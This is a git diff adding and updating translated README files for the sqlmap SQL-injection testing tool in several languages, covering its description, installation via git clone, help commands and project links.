+بۆ بەدەستهێنانی تێڕوانینێکی گشتی لە تواناکانی sqlmap، لیستی تایبەتمەندییە پشتگیریکراوەکان، و وەسفکردنی هەموو هەڵبژاردن و سویچەکان، لەگەڵ نموونەکان، ئامۆژگاریت دەکرێت کە ڕاوێژ بە [دەستنووسی بەکارهێنەر](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+بەستەرەکان
+----
+
+* ماڵپەڕی سەرەکی: https://sqlmap.org
+* داگرتن: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یان [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* فیدی RSS جێبەجێ دەکات: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* شوێنپێهەڵگری کێشەکان: https://github.com/sqlmapproject/sqlmap/issues
+* ڕێنمایی بەکارهێنەر: https://github.com/sqlmapproject/sqlmap/wiki
+* پرسیارە زۆرەکان (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* دیمۆ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* وێنەی شاشە: https://github.com/sqlmapproject/sqlmap/wiki/وێنەی شاشە
+
+وەرگێڕانەکان
diff --git a/doc/translations/README-de-DE.md b/doc/translations/README-de-DE.md
new file mode 100644
index 00000000000..379a0575c52
--- /dev/null
+++ b/doc/translations/README-de-DE.md
@@ -0,0 +1,49 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+sqlmap ist ein quelloffenes Penetrationstest Werkzeug, das die Entdeckung, Ausnutzung und Übernahme von SQL injection Schwachstellen automatisiert. Es kommt mit einer mächtigen Erkennungs-Engine, vielen Nischenfunktionen für den ultimativen Penetrationstester und einem breiten Spektrum an Funktionen von Datenbankerkennung, abrufen von Daten aus der Datenbank, zugreifen auf das unterliegende Dateisystem bis hin zur Befehlsausführung auf dem Betriebssystem mit Hilfe von out-of-band Verbindungen.
+
+Screenshots
+---
+
+
+
+Du kannst eine [Sammlung von Screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), die einige der Funktionen demonstrieren, auf dem Wiki einsehen.
+
+Installation
+---
+
+[Hier](https://github.com/sqlmapproject/sqlmap/tarball/master) kannst du das neueste TAR-Archiv herunterladen und [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) das neueste ZIP-Archiv.
+
+Vorzugsweise kannst du sqlmap herunterladen, indem du das [GIT](https://github.com/sqlmapproject/sqlmap) Repository klonst:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap funktioniert sofort mit den [Python](https://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform.
+
+Benutzung
+---
+
+Um eine Liste aller grundsätzlichen Optionen und Switches zu bekommen, nutze diesen Befehl:
+
+ python sqlmap.py -h
+
+Um eine Liste alles Optionen und Switches zu bekommen, nutze diesen Befehl:
+
+ python sqlmap.py -hh
+
+Ein Probelauf ist [hier](https://asciinema.org/a/46601) zu finden. Um einen Überblick über sqlmap's Fähigkeiten, unterstütze Funktionen und eine Erklärung aller Optionen und Switches, zusammen mit Beispielen, zu erhalten, wird das [Benutzerhandbuch](https://github.com/sqlmapproject/sqlmap/wiki/Usage) empfohlen.
+
+Links
+---
+
+* Webseite: https://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Problemverfolgung: https://github.com/sqlmapproject/sqlmap/issues
+* Benutzerhandbuch: https://github.com/sqlmapproject/sqlmap/wiki
+* Häufig gestellte Fragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demonstrationen: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-es-MX.md b/doc/translations/README-es-MX.md
index d81139c848b..4432ae85835 100644
--- a/doc/translations/README-es-MX.md
+++ b/doc/translations/README-es-MX.md
@@ -1,6 +1,6 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
@@ -19,7 +19,7 @@ Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https:/
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) ** 2.6.x** y ** 2.7.x** en cualquier plataforma.
+sqlmap funciona con las siguientes versiones de [Python](https://www.python.org/download/) **2.6**, **2.7** y **3.x** en cualquier plataforma.
Uso
---
@@ -38,12 +38,12 @@ Para obtener una visión general de las capacidades de sqlmap, así como un list
Enlaces
---
-* Página principal: http://sqlmap.org
+* Página principal: https://sqlmap.org
* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues
* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki
* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demostraciones: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-fa-IR.md b/doc/translations/README-fa-IR.md
new file mode 100644
index 00000000000..e3d9daf604c
--- /dev/null
+++ b/doc/translations/README-fa-IR.md
@@ -0,0 +1,84 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+
+
+
+
+
+برنامه `sqlmap`، یک برنامهی تست نفوذ منبع باز است که فرآیند تشخیص و اکسپلویت پایگاه های داده با مشکل امنیتی SQL Injection را بطور خودکار انجام می دهد. این برنامه مجهز به موتور تشخیص قدرتمندی میباشد. همچنین داری طیف گستردهای از اسکریپت ها میباشد که برای متخصصان تست نفوذ کار کردن با بانک اطلاعاتی را راحتر میکند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق ارتباط Out Of Band درسیستم عامل را امکان پذیر میکند.
+
+
+تصویر محیط ابزار
+----
+
+
+
+
+برای نمایش [مجموعه ای از اسکریپتها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) میتوانید از دانشنامه دیدن کنید.
+
+
+نصب
+----
+
+برای دانلود اخرین نسخه tarball، با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/tarball/master) یا دانلود اخرین نسخه zipball با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/zipball/master) میتوانید این کار را انجام دهید.
+
+
+نحوه استفاده
+----
+
+
+برای دریافت لیست ارگومانهای اساسی میتوانید از دستور زیر استفاده کنید:
+
+
+
+
+
+
+```
+ python sqlmap.py -h
+```
+
+
+
+
+
+
+
+برای دریافت لیست تمامی ارگومانها میتوانید از دستور زیر استفاده کنید:
+
+
+
+
+```
+ python sqlmap.py -hh
+```
+
+
+
+
+
+برای اجرای سریع و ساده ابزار می توانید از [اینجا](https://asciinema.org/a/46601) استفاده کنید. برای دریافت اطلاعات بیشتر در رابطه با قابلیت ها ، امکانات قابل پشتیبانی و لیست کامل امکانات و دستورات همراه با مثال می توانید به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید.
+
+
+لینکها
+----
+
+
+* خانه: https://sqlmap.org
+* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یا [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* پیگیری مشکلات: https://github.com/sqlmapproject/sqlmap/issues
+* راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki
+* سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* توییتر: [@sqlmap](https://x.com/sqlmap)
+* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* تصاویر: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-fr-FR.md b/doc/translations/README-fr-FR.md
index e1cbec97d17..964f7e1045a 100644
--- a/doc/translations/README-fr-FR.md
+++ b/doc/translations/README-fr-FR.md
@@ -1,6 +1,6 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation.
@@ -13,15 +13,15 @@ Les captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/w
Installation
----
-Vous pouvez télécharger le plus récent fichier tarball en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger le plus récent archive zip [ici](https://github.com/sqlmapproject/sqlmap/zipball/master).
+Vous pouvez télécharger le fichier "tarball" le plus récent en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger l'archive zip la plus récente [ici](https://github.com/sqlmapproject/sqlmap/zipball/master).
De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap):
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6.x** et **2.7.x** de [Python](http://www.python.org/download/)
+sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6**, **2.7** et **3.x** de [Python](https://www.python.org/download/)
-Usage
+Utilisation
----
Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez:
@@ -32,18 +32,18 @@ Pour afficher une liste complète des options et des commutateurs (switches), ta
python sqlmap.py -hh
-Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
-Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge et la description de toutes les options, ainsi que des exemples , nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+Vous pouvez regarder une vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
+Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge, la description de toutes les options, ainsi que des exemples, nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Liens
----
-* Page d'acceuil: http://sqlmap.org
+* Page d'acceuil: https://sqlmap.org
* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
-* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues
* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki
* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Démonstrations: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* X: [@sqlmap](https://x.com/sqlmap)
+* Démonstrations: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md
index 33beca4208c..ede6340d1ce 100644
--- a/doc/translations/README-gr-GR.md
+++ b/doc/translations/README-gr-GR.md
@@ -1,6 +1,6 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
@@ -20,7 +20,7 @@
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
+Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](https://www.python.org/download/) έκδοσης **2.6**, **2.7** και **3.x** σε όποια πλατφόρμα.
Χρήση
----
@@ -39,12 +39,12 @@
Σύνδεσμοι
----
-* Αρχική σελίδα: http://sqlmap.org
+* Αρχική σελίδα: https://sqlmap.org
* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-hr-HR.md b/doc/translations/README-hr-HR.md
index 85fe1193c95..dffab7062e6 100644
--- a/doc/translations/README-hr-HR.md
+++ b/doc/translations/README-hr-HR.md
@@ -1,6 +1,6 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
@@ -20,7 +20,7 @@ Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sql
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
+sqlmap radi bez posebnih zahtjeva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi.
Korištenje
----
@@ -39,12 +39,12 @@ Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te op
Poveznice
----
-* Početna stranica: http://sqlmap.org
+* Početna stranica: https://sqlmap.org
* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-id-ID.md b/doc/translations/README-id-ID.md
index 4f8ec4284b6..39ad3e58fb9 100644
--- a/doc/translations/README-id-ID.md
+++ b/doc/translations/README-id-ID.md
@@ -1,51 +1,53 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
-sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
+sqlmap adalah perangkat lunak sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data.
+
+sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Perangkat lunak ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
Tangkapan Layar
----

-Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
+Anda juga dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
Instalasi
----
-Anda dapat mengunduh tarball versi terbaru [di sini]
-(https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
+Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
-Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
+Sebagai alternatif, Anda dapat mengunduh sqlmap dengan melakukan _clone_ pada repositori [Git](https://github.com/sqlmapproject/sqlmap):
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun.
+sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi **2.6**, **2.7** dan **3.x** pada platform apapun.
Penggunaan
----
-Untuk mendapatkan daftar opsi dasar gunakan:
+Untuk mendapatkan daftar opsi dasar gunakan perintah:
python sqlmap.py -h
-Untuk mendapatkan daftar opsi lanjut gunakan:
+Untuk mendapatkan daftar opsi lanjutan gunakan perintah:
python sqlmap.py -hh
Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).
-Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya. Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Tautan
----
-* Situs: http://sqlmap.org
+* Situs: https://sqlmap.org
* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
-* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
-* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* RSS Feed Dari Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
-* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos)
+* Pertanyaan Yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos)
* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-in-HI.md b/doc/translations/README-in-HI.md
new file mode 100644
index 00000000000..c2d323bcc81
--- /dev/null
+++ b/doc/translations/README-in-HI.md
@@ -0,0 +1,50 @@
+# sqlmap 
+
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
+
+sqlmap एक ओपन सोर्स प्रवेश परीक्षण उपकरण है जो SQL इन्जेक्शन दोषों की पहचान और उपयोग की प्रक्रिया को स्वचलित करता है और डेटाबेस सर्वरों को अधिकृत कर लेता है। इसके साथ एक शक्तिशाली पहचान इंजन, अंतिम प्रवेश परीक्षक के लिए कई निचले विशेषताएँ और डेटाबेस प्रिंट करने, डेटाबेस से डेटा निकालने, नीचे के फ़ाइल सिस्टम तक पहुँचने और आउट-ऑफ-बैंड कनेक्शन के माध्यम से ऑपरेटिंग सिस्टम पर कमांड चलाने के लिए कई बड़े रेंज के स्विच शामिल हैं।
+
+चित्रसंवाद
+----
+
+
+
+आप [विकि पर](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) कुछ फीचर्स की दिखाते हुए छवियों का संग्रह देख सकते हैं।
+
+स्थापना
+----
+
+आप नवीनतम तारबाल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/tarball/master) या नवीनतम ज़िपबॉल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/zipball/master) डाउनलोड कर सकते हैं।
+
+प्राथमिकत: आप sqlmap को [गिट](https://github.com/sqlmapproject/sqlmap) रिपॉजिटरी क्लोन करके भी डाउनलोड कर सकते हैं:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap [Python](https://www.python.org/download/) संस्करण **2.6**, **2.7** और **3.x** पर किसी भी प्लेटफार्म पर तुरंत काम करता है।
+
+उपयोग
+----
+
+मौलिक विकल्पों और स्विच की सूची प्राप्त करने के लिए:
+
+ python sqlmap.py -h
+
+सभी विकल्पों और स्विच की सूची प्राप्त करने के लिए:
+
+ python sqlmap.py -hh
+
+आप [यहां](https://asciinema.org/a/46601) एक नमूना चलाने का पता लगा सकते हैं। sqlmap की क्षमताओं की एक अवलोकन प्राप्त करने, समर्थित फीचर्स की सूची और सभी विकल्पों और स्विच का वर्णन, साथ ही उदाहरणों के साथ, आपको [उपयोगकर्ता मैन्युअल](https://github.com/sqlmapproject/sqlmap/wiki/Usage) पर परामर्श दिया जाता है।
+
+लिंक
+----
+
+* मुखपृष्ठ: https://sqlmap.org
+* डाउनलोड: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) या [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* संवाद आरएसएस फ़ीड: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* समस्या ट्रैकर: https://github.com/sqlmapproject/sqlmap/issues
+* उपयोगकर्ता मैन्युअल: https://github.com/sqlmapproject/sqlmap/wiki
+* अक्सर पूछे जाने वाले प्रश्न (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* ट्विटर: [@sqlmap](https://x.com/sqlmap)
+* डेमो: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* स्क्रीनशॉट: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+*
diff --git a/doc/translations/README-it-IT.md b/doc/translations/README-it-IT.md
index c9be5355ce2..af10ee150cc 100644
--- a/doc/translations/README-it-IT.md
+++ b/doc/translations/README-it-IT.md
@@ -1,6 +1,6 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band.
@@ -20,7 +20,7 @@ La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](htt
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap è in grado di funzionare con le versioni **2.6.x** e **2.7.x** di [Python](http://www.python.org/download/) su ogni piattaforma.
+sqlmap è in grado di funzionare con le versioni **2.6**, **2.7** e **3.x** di [Python](https://www.python.org/download/) su ogni piattaforma.
Utilizzo
----
@@ -39,12 +39,12 @@ Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità
Link
----
-* Sito: http://sqlmap.org
+* Sito: https://sqlmap.org
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki
* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Dimostrazioni: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* X: [@sqlmap](https://x.com/sqlmap)
+* Dimostrazioni: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
